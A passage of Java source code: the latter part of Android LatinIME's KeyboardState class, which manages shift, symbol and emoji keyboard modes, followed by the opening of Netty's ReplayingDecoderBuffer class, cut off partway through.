private static final int SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE = 4;
private static final int SWITCH_STATE_MOMENTARY_ALPHA_SHIFT = 5;
private int mSwitchState = SWITCH_STATE_ALPHA;
// TODO: Consolidate these two mode booleans into one integer to distinguish between alphabet,
// symbols, and emoji mode.
private boolean mIsAlphabetMode;
private boolean mIsEmojiMode;
private AlphabetShiftState mAlphabetShiftState = new AlphabetShiftState();
private boolean mIsSymbolShifted;
private boolean mPrevMainKeyboardWasShiftLocked;
private boolean mPrevSymbolsKeyboardWasShifted;
private int mRecapitalizeMode;
// For handling double tap.
private boolean mIsInAlphabetUnshiftedFromShifted;
private boolean mIsInDoubleTapShiftKey;
private final SavedKeyboardState mSavedKeyboardState = new SavedKeyboardState();
static final class SavedKeyboardState {
public boolean mIsValid;
public boolean mIsAlphabetMode;
public boolean mIsAlphabetShiftLocked;
public boolean mIsEmojiMode;
public int mShiftMode;
@Override
public String toString() {
if (!mIsValid) return "INVALID";
if (mIsAlphabetMode) {
if (mIsAlphabetShiftLocked) return "ALPHABET_SHIFT_LOCKED";
return "ALPHABET_" + shiftModeToString(mShiftMode);
} else if (mIsEmojiMode) {
return "EMOJI";
} else {
return "SYMBOLS_" + shiftModeToString(mShiftMode);
}
}
}
public KeyboardState(final SwitchActions switchActions) {
mSwitchActions = switchActions;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
}
public void onLoadKeyboard(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onLoadKeyboard: " + this);
}
// Reset alphabet shift state.
mAlphabetShiftState.setShiftLocked(false);
mPrevMainKeyboardWasShiftLocked = false;
mPrevSymbolsKeyboardWasShifted = false;
mShiftKeyState.onRelease();
mSymbolKeyState.onRelease();
onRestoreKeyboardState(currentAutoCapsState, currentRecapitalizeState);
}
private static final int UNSHIFT = 0;
private static final int MANUAL_SHIFT = 1;
private static final int AUTOMATIC_SHIFT = 2;
private static final int SHIFT_LOCK_SHIFTED = 3;
public void onSaveKeyboardState() {
final SavedKeyboardState state = mSavedKeyboardState;
state.mIsAlphabetMode = mIsAlphabetMode;
state.mIsEmojiMode = mIsEmojiMode;
if (mIsAlphabetMode) {
state.mIsAlphabetShiftLocked = mAlphabetShiftState.isShiftLocked();
state.mShiftMode = mAlphabetShiftState.isAutomaticShifted() ? AUTOMATIC_SHIFT
: (mAlphabetShiftState.isShiftedOrShiftLocked() ? MANUAL_SHIFT : UNSHIFT);
} else {
state.mIsAlphabetShiftLocked = mPrevMainKeyboardWasShiftLocked;
state.mShiftMode = mIsSymbolShifted ? MANUAL_SHIFT : UNSHIFT;
}
state.mIsValid = true;
if (DEBUG_EVENT) {
Log.d(TAG, "onSaveKeyboardState: saved=" + state + " " + this);
}
}
private void onRestoreKeyboardState(final int currentAutoCapsState,
final int currentRecapitalizeState) {
final SavedKeyboardState state = mSavedKeyboardState;
if (DEBUG_EVENT) {
Log.d(TAG, "onRestoreKeyboardState: saved=" + state + " " + this);
}
if (!state.mIsValid || state.mIsAlphabetMode) {
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
} else if (state.mIsEmojiMode) {
setEmojiKeyboard();
} else {
if (state.mShiftMode == MANUAL_SHIFT) {
setSymbolsShiftedKeyboard();
} else {
setSymbolsKeyboard();
}
}
if (!state.mIsValid) return;
state.mIsValid = false;
if (state.mIsAlphabetMode) {
setShiftLocked(state.mIsAlphabetShiftLocked);
if (!state.mIsAlphabetShiftLocked) {
setShifted(state.mShiftMode);
}
} else {
mPrevMainKeyboardWasShiftLocked = state.mIsAlphabetShiftLocked;
}
}
private void setShifted(final int shiftMode) {
if (DEBUG_ACTION) {
Log.d(TAG, "setShifted: shiftMode=" + shiftModeToString(shiftMode) + " " + this);
}
if (!mIsAlphabetMode) return;
final int prevShiftMode;
if (mAlphabetShiftState.isAutomaticShifted()) {
prevShiftMode = AUTOMATIC_SHIFT;
} else if (mAlphabetShiftState.isManualShifted()) {
prevShiftMode = MANUAL_SHIFT;
} else {
prevShiftMode = UNSHIFT;
}
switch (shiftMode) {
case AUTOMATIC_SHIFT:
mAlphabetShiftState.setAutomaticShifted();
if (shiftMode != prevShiftMode) {
mSwitchActions.setAlphabetAutomaticShiftedKeyboard();
}
break;
case MANUAL_SHIFT:
mAlphabetShiftState.setShifted(true);
if (shiftMode != prevShiftMode) {
mSwitchActions.setAlphabetManualShiftedKeyboard();
}
break;
case UNSHIFT:
mAlphabetShiftState.setShifted(false);
if (shiftMode != prevShiftMode) {
mSwitchActions.setAlphabetKeyboard();
}
break;
case SHIFT_LOCK_SHIFTED:
mAlphabetShiftState.setShifted(true);
mSwitchActions.setAlphabetShiftLockShiftedKeyboard();
break;
}
}
private void setShiftLocked(final boolean shiftLocked) {
if (DEBUG_ACTION) {
Log.d(TAG, "setShiftLocked: shiftLocked=" + shiftLocked + " " + this);
}
if (!mIsAlphabetMode) return;
if (shiftLocked && (!mAlphabetShiftState.isShiftLocked()
|| mAlphabetShiftState.isShiftLockShifted())) {
mSwitchActions.setAlphabetShiftLockedKeyboard();
}
if (!shiftLocked && mAlphabetShiftState.isShiftLocked()) {
mSwitchActions.setAlphabetKeyboard();
}
mAlphabetShiftState.setShiftLocked(shiftLocked);
}
private void toggleAlphabetAndSymbols(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_ACTION) {
Log.d(TAG, "toggleAlphabetAndSymbols: " + this);
}
if (mIsAlphabetMode) {
mPrevMainKeyboardWasShiftLocked = mAlphabetShiftState.isShiftLocked();
if (mPrevSymbolsKeyboardWasShifted) {
setSymbolsShiftedKeyboard();
} else {
setSymbolsKeyboard();
}
mPrevSymbolsKeyboardWasShifted = false;
} else {
mPrevSymbolsKeyboardWasShifted = mIsSymbolShifted;
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
if (mPrevMainKeyboardWasShiftLocked) {
setShiftLocked(true);
}
mPrevMainKeyboardWasShiftLocked = false;
}
}
// TODO: Remove this method. Come up with a more comprehensive way to reset the keyboard layout
// when a keyboard layout set doesn't get reloaded in LatinIME.onStartInputViewInternal().
private void resetKeyboardStateToAlphabet(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_ACTION) {
Log.d(TAG, "resetKeyboardStateToAlphabet: " + this);
}
if (mIsAlphabetMode) return;
mPrevSymbolsKeyboardWasShifted = mIsSymbolShifted;
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
if (mPrevMainKeyboardWasShiftLocked) {
setShiftLocked(true);
}
mPrevMainKeyboardWasShiftLocked = false;
}
private void toggleShiftInSymbols() {
if (mIsSymbolShifted) {
setSymbolsKeyboard();
} else {
setSymbolsShiftedKeyboard();
}
}
private void setAlphabetKeyboard(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_ACTION) {
Log.d(TAG, "setAlphabetKeyboard");
}
mSwitchActions.setAlphabetKeyboard();
mIsAlphabetMode = true;
mIsEmojiMode = false;
mIsSymbolShifted = false;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
mSwitchState = SWITCH_STATE_ALPHA;
mSwitchActions.requestUpdatingShiftState(currentAutoCapsState, currentRecapitalizeState);
}
private void setSymbolsKeyboard() {
if (DEBUG_ACTION) {
Log.d(TAG, "setSymbolsKeyboard");
}
mSwitchActions.setSymbolsKeyboard();
mIsAlphabetMode = false;
mIsSymbolShifted = false;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
// Reset alphabet shift state.
mAlphabetShiftState.setShiftLocked(false);
mSwitchState = SWITCH_STATE_SYMBOL_BEGIN;
}
private void setSymbolsShiftedKeyboard() {
if (DEBUG_ACTION) {
Log.d(TAG, "setSymbolsShiftedKeyboard");
}
mSwitchActions.setSymbolsShiftedKeyboard();
mIsAlphabetMode = false;
mIsSymbolShifted = true;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
// Reset alphabet shift state.
mAlphabetShiftState.setShiftLocked(false);
mSwitchState = SWITCH_STATE_SYMBOL_BEGIN;
}
private void setEmojiKeyboard() {
if (DEBUG_ACTION) {
Log.d(TAG, "setEmojiKeyboard");
}
mIsAlphabetMode = false;
mIsEmojiMode = true;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
// Remember caps lock mode and reset alphabet shift state.
mPrevMainKeyboardWasShiftLocked = mAlphabetShiftState.isShiftLocked();
mAlphabetShiftState.setShiftLocked(false);
mSwitchActions.setEmojiKeyboard();
}
public void onPressKey(final int code, final boolean isSinglePointer,
final int currentAutoCapsState, final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onPressKey: code=" + Constants.printableCode(code) + " single="
+ isSinglePointer + " autoCaps=" + currentAutoCapsState + " " + this);
}
if (code != Constants.CODE_SHIFT) {
// Because the double tap shift key timer is to detect two consecutive shift key press,
// it should be canceled when a non-shift key is pressed.
mSwitchActions.cancelDoubleTapShiftKeyTimer();
}
if (code == Constants.CODE_SHIFT) {
onPressShift();
} else if (code == Constants.CODE_CAPSLOCK) {
// Nothing to do here. See {@link #onReleaseKey(int,boolean)}.
} else if (code == Constants.CODE_SWITCH_ALPHA_SYMBOL) {
onPressSymbol(currentAutoCapsState, currentRecapitalizeState);
} else {
mShiftKeyState.onOtherKeyPressed();
mSymbolKeyState.onOtherKeyPressed();
// It is required to reset the auto caps state when all of the following conditions
// are met:
// 1) two or more fingers are in action
// 2) in alphabet layout
// 3) not in all characters caps mode
// As for #3, please note that it's required to check even when the auto caps mode is
// off because, for example, we may be in the #1 state within the manual temporary
// shifted mode.
if (!isSinglePointer && mIsAlphabetMode
&& currentAutoCapsState != TextUtils.CAP_MODE_CHARACTERS) {
final boolean needsToResetAutoCaps = mAlphabetShiftState.isAutomaticShifted()
|| (mAlphabetShiftState.isManualShifted() && mShiftKeyState.isReleasing());
if (needsToResetAutoCaps) {
mSwitchActions.setAlphabetKeyboard();
}
}
}
}
public void onReleaseKey(final int code, final boolean withSliding,
final int currentAutoCapsState, final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onReleaseKey: code=" + Constants.printableCode(code)
+ " sliding=" + withSliding + " " + this);
}
if (code == Constants.CODE_SHIFT) {
onReleaseShift(withSliding, currentAutoCapsState, currentRecapitalizeState);
} else if (code == Constants.CODE_CAPSLOCK) {
setShiftLocked(!mAlphabetShiftState.isShiftLocked());
} else if (code == Constants.CODE_SWITCH_ALPHA_SYMBOL) {
onReleaseSymbol(withSliding, currentAutoCapsState, currentRecapitalizeState);
}
}
private void onPressSymbol(final int currentAutoCapsState,
final int currentRecapitalizeState) {
toggleAlphabetAndSymbols(currentAutoCapsState, currentRecapitalizeState);
mSymbolKeyState.onPress();
mSwitchState = SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL;
}
private void onReleaseSymbol(final boolean withSliding, final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (mSymbolKeyState.isChording()) {
// Switch back to the previous keyboard mode if the user chords the mode change key and
// another key, then releases the mode change key.
toggleAlphabetAndSymbols(currentAutoCapsState, currentRecapitalizeState);
} else if (!withSliding) {
// If the mode change key is being released without sliding, we should forget the
// previous symbols keyboard shift state and simply switch back to symbols layout
// (never symbols shifted) next time the mode gets changed to symbols layout.
mPrevSymbolsKeyboardWasShifted = false;
}
mSymbolKeyState.onRelease();
}
public void onUpdateShiftState(final int autoCaps, final int recapitalizeMode) {
if (DEBUG_EVENT) {
Log.d(TAG, "onUpdateShiftState: autoCaps=" + autoCaps + ", recapitalizeMode="
+ recapitalizeMode + " " + this);
}
mRecapitalizeMode = recapitalizeMode;
updateAlphabetShiftState(autoCaps, recapitalizeMode);
}
// TODO: Remove this method. Come up with a more comprehensive way to reset the keyboard layout
// when a keyboard layout set doesn't get reloaded in LatinIME.onStartInputViewInternal().
public void onResetKeyboardStateToAlphabet(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onResetKeyboardStateToAlphabet: " + this);
}
resetKeyboardStateToAlphabet(currentAutoCapsState, currentRecapitalizeState);
}
private void updateShiftStateForRecapitalize(final int recapitalizeMode) {
switch (recapitalizeMode) {
case RecapitalizeStatus.CAPS_MODE_ALL_UPPER:
setShifted(SHIFT_LOCK_SHIFTED);
break;
case RecapitalizeStatus.CAPS_MODE_FIRST_WORD_UPPER:
setShifted(AUTOMATIC_SHIFT);
break;
case RecapitalizeStatus.CAPS_MODE_ALL_LOWER:
case RecapitalizeStatus.CAPS_MODE_ORIGINAL_MIXED_CASE:
default:
setShifted(UNSHIFT);
}
}
private void updateAlphabetShiftState(final int autoCaps, final int recapitalizeMode) {
if (!mIsAlphabetMode) return;
if (RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE != recapitalizeMode) {
// We are recapitalizing. Match the keyboard to the current recapitalize state.
updateShiftStateForRecapitalize(recapitalizeMode);
return;
}
if (!mShiftKeyState.isReleasing()) {
// Ignore update shift state event while the shift key is being pressed (including
// chording).
return;
}
if (!mAlphabetShiftState.isShiftLocked() && !mShiftKeyState.isIgnoring()) {
if (mShiftKeyState.isReleasing() && autoCaps != Constants.TextUtils.CAP_MODE_OFF) {
// Only when shift key is releasing, automatic temporary upper case will be set.
setShifted(AUTOMATIC_SHIFT);
} else {
setShifted(mShiftKeyState.isChording() ? MANUAL_SHIFT : UNSHIFT);
}
}
}
private void onPressShift() {
// If we are recapitalizing, we don't do any of the normal processing, including
// importantly the double tap timer.
if (RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE != mRecapitalizeMode) {
return;
}
if (mIsAlphabetMode) {
mIsInDoubleTapShiftKey = mSwitchActions.isInDoubleTapShiftKeyTimeout();
if (!mIsInDoubleTapShiftKey) {
// This is first tap.
mSwitchActions.startDoubleTapShiftKeyTimer();
}
if (mIsInDoubleTapShiftKey) {
if (mAlphabetShiftState.isManualShifted() || mIsInAlphabetUnshiftedFromShifted) {
// Shift key has been double tapped while in manual shifted or automatic
// shifted state.
setShiftLocked(true);
} else {
// Shift key has been double tapped while in normal state. This is the second
// tap to disable shift locked state, so just ignore this.
}
} else {
if (mAlphabetShiftState.isShiftLocked()) {
// Shift key is pressed while shift locked state, we will treat this state as
// shift lock shifted state and mark as if shift key pressed while normal
// state.
setShifted(SHIFT_LOCK_SHIFTED);
mShiftKeyState.onPress();
} else if (mAlphabetShiftState.isAutomaticShifted()) {
// Shift key is pressed while automatic shifted, we have to move to manual
// shifted.
setShifted(MANUAL_SHIFT);
mShiftKeyState.onPress();
} else if (mAlphabetShiftState.isShiftedOrShiftLocked()) {
// In manual shifted state, we just record shift key has been pressing while
// shifted state.
mShiftKeyState.onPressOnShifted();
} else {
// In base layout, chording or manual shifted mode is started.
setShifted(MANUAL_SHIFT);
mShiftKeyState.onPress();
}
}
} else {
// In symbol mode, just toggle symbol and symbol more keyboard.
toggleShiftInSymbols();
mSwitchState = SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE;
mShiftKeyState.onPress();
}
}
private void onReleaseShift(final boolean withSliding, final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE != mRecapitalizeMode) {
// We are recapitalizing. We should match the keyboard state to the recapitalize
// state in priority.
updateShiftStateForRecapitalize(mRecapitalizeMode);
} else if (mIsAlphabetMode) {
final boolean isShiftLocked = mAlphabetShiftState.isShiftLocked();
mIsInAlphabetUnshiftedFromShifted = false;
if (mIsInDoubleTapShiftKey) {
// Double tap shift key has been handled in {@link #onPressShift}, so that just
// ignore this release shift key here.
mIsInDoubleTapShiftKey = false;
} else if (mShiftKeyState.isChording()) {
if (mAlphabetShiftState.isShiftLockShifted()) {
// After chording input while shift locked state.
setShiftLocked(true);
} else {
// After chording input while normal state.
setShifted(UNSHIFT);
}
// After chording input, automatic shift state may have been changed depending on
// what characters were input.
mShiftKeyState.onRelease();
mSwitchActions.requestUpdatingShiftState(currentAutoCapsState,
currentRecapitalizeState);
return;
} else if (mAlphabetShiftState.isShiftLockShifted() && withSliding) {
// In shift locked state, shift has been pressed and slid out to other key.
setShiftLocked(true);
} else if (mAlphabetShiftState.isManualShifted() && withSliding) {
// Shift has been pressed and slid out to other key.
mSwitchState = SWITCH_STATE_MOMENTARY_ALPHA_SHIFT;
} else if (isShiftLocked && !mAlphabetShiftState.isShiftLockShifted()
&& (mShiftKeyState.isPressing() || mShiftKeyState.isPressingOnShifted())
&& !withSliding) {
// Shift has been long pressed, ignore this release.
} else if (isShiftLocked && !mShiftKeyState.isIgnoring() && !withSliding) {
// Shift has been pressed without chording while shift locked state.
setShiftLocked(false);
} else if (mAlphabetShiftState.isShiftedOrShiftLocked()
&& mShiftKeyState.isPressingOnShifted() && !withSliding) {
// Shift has been pressed without chording while shifted state.
setShifted(UNSHIFT);
mIsInAlphabetUnshiftedFromShifted = true;
} else if (mAlphabetShiftState.isManualShiftedFromAutomaticShifted()
&& mShiftKeyState.isPressing() && !withSliding) {
// Shift has been pressed without chording while manual shifted transited from
// automatic shifted
setShifted(UNSHIFT);
mIsInAlphabetUnshiftedFromShifted = true;
}
} else {
// In symbol mode, switch back to the previous keyboard mode if the user chords the
// shift key and another key, then releases the shift key.
if (mShiftKeyState.isChording()) {
toggleShiftInSymbols();
}
}
mShiftKeyState.onRelease();
}
public void onFinishSlidingInput(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onFinishSlidingInput: " + this);
}
// Switch back to the previous keyboard mode if the user cancels sliding input.
switch (mSwitchState) {
case SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL:
toggleAlphabetAndSymbols(currentAutoCapsState, currentRecapitalizeState);
break;
case SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE:
toggleShiftInSymbols();
break;
case SWITCH_STATE_MOMENTARY_ALPHA_SHIFT:
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
break;
}
}
private static boolean isSpaceOrEnter(final int c) {
return c == Constants.CODE_SPACE || c == Constants.CODE_ENTER;
}
public void onCodeInput(final int code, final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onCodeInput: code=" + Constants.printableCode(code)
+ " autoCaps=" + currentAutoCapsState + " " + this);
}
switch (mSwitchState) {
case SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL:
if (code == Constants.CODE_SWITCH_ALPHA_SYMBOL) {
// Detected only the mode change key has been pressed, and then released.
if (mIsAlphabetMode) {
mSwitchState = SWITCH_STATE_ALPHA;
} else {
mSwitchState = SWITCH_STATE_SYMBOL_BEGIN;
}
}
break;
case SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE:
if (code == Constants.CODE_SHIFT) {
// Detected only the shift key has been pressed on symbol layout, and then
// released.
mSwitchState = SWITCH_STATE_SYMBOL_BEGIN;
}
break;
case SWITCH_STATE_SYMBOL_BEGIN:
if (mIsEmojiMode) {
// When in the Emoji keyboard, we don't want to switch back to the main layout even
// after the user hits an emoji letter followed by an enter or a space.
break;
}
if (!isSpaceOrEnter(code) && (Constants.isLetterCode(code)
|| code == Constants.CODE_OUTPUT_TEXT)) {
mSwitchState = SWITCH_STATE_SYMBOL;
}
break;
case SWITCH_STATE_SYMBOL:
// Switch back to alpha keyboard mode if user types one or more non-space/enter
// characters followed by a space/enter.
if (isSpaceOrEnter(code)) {
toggleAlphabetAndSymbols(currentAutoCapsState, currentRecapitalizeState);
mPrevSymbolsKeyboardWasShifted = false;
}
break;
}
// If the code is a letter, update keyboard shift state.
if (Constants.isLetterCode(code)) {
updateAlphabetShiftState(currentAutoCapsState, currentRecapitalizeState);
} else if (code == Constants.CODE_EMOJI) {
setEmojiKeyboard();
} else if (code == Constants.CODE_ALPHA_FROM_EMOJI) {
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
}
}
static String shiftModeToString(final int shiftMode) {
switch (shiftMode) {
case UNSHIFT: return "UNSHIFT";
case MANUAL_SHIFT: return "MANUAL";
case AUTOMATIC_SHIFT: return "AUTOMATIC";
default: return null;
}
}
private static String switchStateToString(final int switchState) {
switch (switchState) {
case SWITCH_STATE_ALPHA: return "ALPHA";
case SWITCH_STATE_SYMBOL_BEGIN: return "SYMBOL-BEGIN";
case SWITCH_STATE_SYMBOL: return "SYMBOL";
case SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL: return "MOMENTARY-ALPHA-SYMBOL";
case SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE: return "MOMENTARY-SYMBOL-MORE";
case SWITCH_STATE_MOMENTARY_ALPHA_SHIFT: return "MOMENTARY-ALPHA_SHIFT";
default: return null;
}
}
@Override
public String toString() {
return "[keyboard=" + (mIsAlphabetMode ? mAlphabetShiftState.toString()
: (mIsSymbolShifted ? "SYMBOLS_SHIFTED" : "SYMBOLS"))
+ " shift=" + mShiftKeyState
+ " symbol=" + mSymbolKeyState
+ " switch=" + switchStateToString(mSwitchState) + "]";
}
}
|
|
/*
* Copyright 2012 The Netty Project
*
* The Netty Project licenses this file to you under the Apache License,
* version 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package io.netty.handler.codec;
import io.netty.buffer.ByteBuf;
import io.netty.buffer.ByteBufAllocator;
import io.netty.buffer.ByteBufProcessor;
import io.netty.buffer.SwappedByteBuf;
import io.netty.buffer.Unpooled;
import io.netty.util.Signal;
import io.netty.util.internal.StringUtil;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.channels.GatheringByteChannel;
import java.nio.channels.ScatteringByteChannel;
import java.nio.charset.Charset;
/**
* Special {@link ByteBuf} implementation which is used by the {@link ReplayingDecoder}
*/
final class ReplayingDecoderBuffer extends ByteBuf {
private static final Signal REPLAY = ReplayingDecoder.REPLAY;
private ByteBuf buffer;
private boolean terminated;
private SwappedByteBuf swapped;
static final ReplayingDecoderBuffer EMPTY_BUFFER = new ReplayingDecoderBuffer(Unpooled.EMPTY_BUFFER);
static {
EMPTY_BUFFER.terminate();
}
ReplayingDecoderBuffer() { }
ReplayingDecoderBuffer(ByteBuf buffer) {
setCumulation(buffer);
}
void setCumulation(ByteBuf buffer) {
this.buffer = buffer;
}
void terminate() {
terminated = true;
}
@Override
public int capacity() {
if (terminated) {
return buffer.capacity();
} else {
return Integer.MAX_VALUE;
}
}
@Override
public ByteBuf capacity(int newCapacity) {
reject();
return this;
}
@Override
public int maxCapacity() {
return capacity();
}
@Override
public ByteBufAllocator alloc() {
return buffer.alloc();
}
@Override
public boolean isDirect() {
return buffer.isDirect();
}
@Override
public boolean hasArray() {
return false;
}
@Override
public byte[] array() {
throw new UnsupportedOperationException();
}
@Override
public int arrayOffset() {
throw new UnsupportedOperationException();
}
@Override
public boolean hasMemoryAddress() {
return false;
}
@Override
public long memoryAddress() {
throw new UnsupportedOperationException();
}
@Override
public ByteBuf clear() {
reject();
return this;
}
@Override
public boolean equals(Object obj) {
return this == obj;
}
@Override
public int compareTo(ByteBuf buffer) {
reject();
return 0;
}
@Override
public ByteBuf copy() {
reject();
return this;
}
@Override
public ByteBuf copy(int index, int length) {
checkIndex(index, length);
return buffer.copy(index, length);
}
@Override
public ByteBuf discardReadBytes() {
reject();
return this;
}
@Override
public ByteBuf ensureWritable(int writableBytes) {
reject();
return this;
}
@Override
public int ensureWritable(int minWritableBytes, boolean force) {
reject();
return 0;
}
@Override
public ByteBuf duplicate() {
reject();
return this;
}
@Override
public boolean getBoolean(int index) {
checkIndex(index, 1);
return buffer.getBoolean(index);
}
@Override
public byte getByte(int index) {
checkIndex(index, 1);
return buffer.getByte(index);
}
@Override
public short getUnsignedByte(int index) {
checkIndex(index, 1);
return buffer.getUnsignedByte(index);
}
@Override
public ByteBuf getBytes(int index, byte[] dst, int dstIndex, int length) {
checkIndex(index, length);
buffer.getBytes(index, dst, dstIndex, length);
return this;
}
@Override
public ByteBuf getBytes(int index, byte[] dst) {
checkIndex(index, dst.length);
buffer.getBytes(index, dst);
return this;
}
@Override
public ByteBuf getBytes(int index, ByteBuffer dst) {
reject();
return this;
}
@Override
public ByteBuf getBytes(int index, ByteBuf dst, int dstIndex, int length) {
checkIndex(index, length);
buffer.getBytes(index, dst, dstIndex, length);
return this;
}
@Override
public ByteBuf getBytes(int index, ByteBuf dst, int length) {
reject();
return this;
}
@Override
public ByteBuf getBytes(int index, ByteBuf dst) {
reject();
return this;
}
@Override
public int getBytes(int index, GatheringByteChannel out, int length) {
reject();
return 0;
}
@Override
public ByteBuf getBytes(int index, OutputStream out, int length) {
reject();
return this;
}
@Override
public int getInt(int index) {
checkIndex(index, 4);
return buffer.getInt(index);
}
@Override
public long getUnsignedInt(int index) {
checkIndex(index, 4);
return buffer.getUnsignedInt(index);
}
@Override
public long getLong(int index) {
checkIndex(index, 8);
return buffer.getLong(index);
}
@Override
public int getMedium(int index) {
checkIndex(index, 3);
return buffer.getMedium(index);
}
@Override
public int getUnsignedMedium(int index) {
checkIndex(index, 3);
return buffer.getUnsignedMedium(index);
}
@Override
public short getShort(int index) {
checkIndex(index, 2);
return buffer.getShort(index);
}
@Override
public int getUnsignedShort(int index) {
checkIndex(index, 2);
return buffer.getUnsignedShort(index);
}
@Override
public char getChar(int index) {
checkIndex(index, 2);
return buffer.getChar(index);
}
@Override
public float getFloat(int index) {
checkIndex(index, 4);
return buffer.getFloat(index);
}
@Override
public double getDouble(int index) {
checkIndex(index, 8);
return buffer.getDouble(index);
}
@Override
public int hashCode() {
reject();
return 0;
}
@Override
public int indexOf(int fromIndex, int toIndex, byte value) {
if (fromIndex == toIndex) {
return -1;
}
if (Math.max(fromIndex, toIndex) > buffer.writerIndex()) {
throw REPLAY;
}
return buffer.indexOf(fromIndex, toIndex, value);
}
@Override
public int bytesBefore(byte value) {
int bytes = buffer.bytesBefore(value);
if (bytes < 0) {
throw REPLAY;
}
return bytes;
}
@Override
public int bytesBefore(int length, byte value) {
final int readerIndex = buffer.readerIndex();
return bytesBefore(readerIndex, buffer.writerIndex() - readerIndex, value);
}
@Override
public int bytesBefore(int index, int length, byte value) {
final int writerIndex = buffer.writerIndex();
if (index >= writerIndex) {
throw REPLAY;
}
if (index <= writerIndex - length) {
return buffer.bytesBefore(index, length, value);
}
int res = buffer.bytesBefore(index, writerIndex - index, value);
if (res < 0) {
throw REPLAY;
} else {
return res;
}
}
@Override
public int forEachByte(ByteBufProcessor processor) {
int ret = buffer.forEachByte(processor);
if (ret < 0) {
throw REPLAY;
} else {
return ret;
}
}
@Override
public int forEachByte(int index, int length, ByteBufProcessor processor) {
final int writerIndex = buffer.writerIndex();
if (index >= writerIndex) {
throw REPLAY;
}
if (index <= writerIndex - length) {
return buffer.forEachByte(index, length, processor);
}
int ret = buffer.forEachByte(index, writerIndex - index, processor);
if (ret < 0) {
throw REPLAY;
} else {
return ret;
}
}
@Override
public int forEachByteDesc(ByteBufProcessor processor) {
if (terminated) {
return buffer.forEachByteDesc(processor);
} else {
reject();
return 0;
}
}
@Override
public int forEachByteDesc(int index, int length, ByteBufProcessor processor) {
if (index + length > buffer.writerIndex()) {
throw REPLAY;
}
return buffer.forEachByteDesc(index, length, processor);
}
@Override
public ByteBuf markReaderIndex() {
buffer.markReaderIndex();
return this;
}
@Override
public ByteBuf markWriterIndex() {
reject();
return this;
}
@Override
public ByteOrder order() {
return buffer.order();
}
@Override
public ByteBuf order(ByteOrder endianness) {
if (endianness == null) {
throw new NullPointerException("endianness");
}
if (endianness == order()) {
return this;
}
SwappedByteBuf swapped = this.swapped;
if (swapped == null) {
this.swapped = swapped = new SwappedByteBuf(this);
}
return swapped;
}
@Override
public boolean isReadable() {
return terminated? buffer.isReadable() : true;
}
@Override
public boolean isReadable(int size) {
return terminated? buffer.isReadable(size) : true;
}
@Override
public int readableBytes() {
if (terminated) {
return buffer.readableBytes();
} else {
return Integer.MAX_VALUE - buffer.readerIndex();
}
}
@Override
public boolean readBoolean() {
checkReadableBytes(1);
return buffer.readBoolean();
}
@Override
public byte readByte() {
checkReadableBytes(1);
return buffer.readByte();
}
@Override
public short readUnsignedByte() {
checkReadableBytes(1);
return buffer.readUnsignedByte();
}
@Override
public ByteBuf readBytes(byte[] dst, int dstIndex, int length) {
checkReadableBytes(length);
buffer.readBytes(dst, dstIndex, length);
return this;
}
@Override
public ByteBuf readBytes(byte[] dst) {
checkReadableBytes(dst.length);
buffer.readBytes(dst);
return this;
}
@Override
public ByteBuf readBytes(ByteBuffer dst) {
reject();
return this;
}
@Override
public ByteBuf readBytes(ByteBuf dst, int dstIndex, int length) {
checkReadableBytes(length);
buffer.readBytes(dst, dstIndex, length);
return this;
}
@Override
public ByteBuf readBytes(ByteBuf dst, int length) {
reject();
return this;
}
@Override
public ByteBuf readBytes(ByteBuf dst) {
checkReadableBytes(dst.writableBytes());
buffer.readBytes(dst);
return this;
}
@Override
public int readBytes(GatheringByteChannel out, int length) {
reject();
return 0;
}
@Override
public ByteBuf readBytes(int length) {
checkReadableBytes(length);
return buffer.readBytes(length);
}
@Override
public ByteBuf readSlice(int length) {
checkReadableBytes(length);
return buffer.readSlice(length);
}
@Override
public ByteBuf readBytes(OutputStream out, int length) {
reject();
return this;
}
@Override
public int readerIndex() {
